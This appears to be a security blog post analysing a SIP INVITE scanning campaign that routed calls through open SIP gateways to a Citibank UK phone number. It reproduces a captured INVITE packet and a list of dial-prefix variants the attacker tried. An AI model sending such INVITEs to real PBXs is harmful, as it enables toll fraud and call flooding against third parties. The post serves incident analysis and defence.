Citibank UK number was target for a “lawnmower” telephone attack today!

Citibank is or has been under a telephone calling attack latest 12 hours. Here I will explain the attack and how it was done.

Have you seen the movie “lawnmower man”, when in the end, all phones rings in the who city? This was the aim for todays attack on Citibank in UK. The attack was simple, but probably effective when it was active. Send SIP INVITE to open SIP gateways and PBXs, who then will actually use the traditional phonesystem (POTS) to call the target. Suddenly you need DoS protection on your traditional POTS lines….

The SIP INVITE looks like this.

INVITE sip:00442075005000@x SIP/2.0
Via: SIP/2.0/UDP 217.23.7.47:58585;branch=z9hG4bKaergjerugroijrgrg
To: <sip:x>
From: <sip:217.23.7.47:58585>;tag=Zerogij34
Call-ID: 213948958-34384780214-384748@217.23.7.47
CSeq: 1 INVITE
Max-Forwards: 69
Contact: <sip:sip@217.23.7.47:58585;transport=udp>
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
Content-Type: application/sdp
Content-Length: 520
Session-Expires: 3600;
Allow-Events: refer..
       v=0
       o=sip 2147483647 1 IN IP4 1.1.1.1
       s=sip
       c=IN IP4 1.1.1.1
       t=0 0
       m=audio 29784 RTP/AVP 8 0 4 18 18 18 18 96 3 98
       a=rtpmap:96 telephone-event/8000
       a=sendrecva=ptime:20
       a=rtpmap:18 G729AB/8000
       a=rtpmap:18 G729B/8000
       a=rtpmap:18 G729A/8000
       a=rtpmap:18 G729/8000
       a=rtpmap:4 G723

Lets walk through the SIP packet and see what info we can get from it:

A quick google search on the tag: Zerogij34 reveals that this attack has been around since at least 6th of August.

The IP (217.23.7.47)from this packet should be located in Portugal but the other attacks originate from both UK and Netherlands.
There is no User-Agent listed, so the packet is very likely crafted from toosl like sipsak or sipp.
The codec list seems real, but they use an obscure address (1.1.1.1) for the RTP. If they would use their own IP address, it could case a small DoS with RTP traffic for every successful call.)The port 29784 is within the range of Cisco units (26 000-32 000)

The other INVITES reveals that the attacker is trying to figure the extension to get a dial-tone:

• INVITE sip:00442075005000@67.170.104.216 SIP/2.0
• INVITE sip:011442075005000@67.170.104.216 SIP/2.0
• INVITE sip:0442075005000@67.170.104.216 SIP/2.0
• INVITE sip:0000442075005000@67.170.104.216 SIP/2.0
• INVITE sip:0011442075005000@67.170.104.216 SIP/2.0
• INVITE sip:900442075005000@67.170.104.216 SIP/2.0
• INVITE sip:9011442075005000@67.170.104.216 SIP/2.0
• INVITE sip:90442075005000@67.170.104.216 SIP/2.0
• INVITE sip:442075005000@67.170.104.216 SIP/2.0
• and several more…

But is this a DoS attack on Citibank? I doubt it. Why call the Citibank on a Sunday 5 a.m.? This is more likely that Citibank has lots of lines and therefore the SIP INVITES does not generate an error (busy or others). The attacker does not hear any ringtone, but he/she should see the 180 Ringing / 180 Session in Progress. Then he or she knows that he could actually get through to the PSTN on this SIP proxy. If it would be a ringing attack, why does the attacker just send one single SIP INVITE through each gateway that actually calls this destination?

The machines with the attacking IP addresses should be put under surveillance to see who connects to these. They are probably just some bots in a larger network, but they need to relay back which gateways actually responded successfully.

Sad to say, but I believe this is only the small beginning….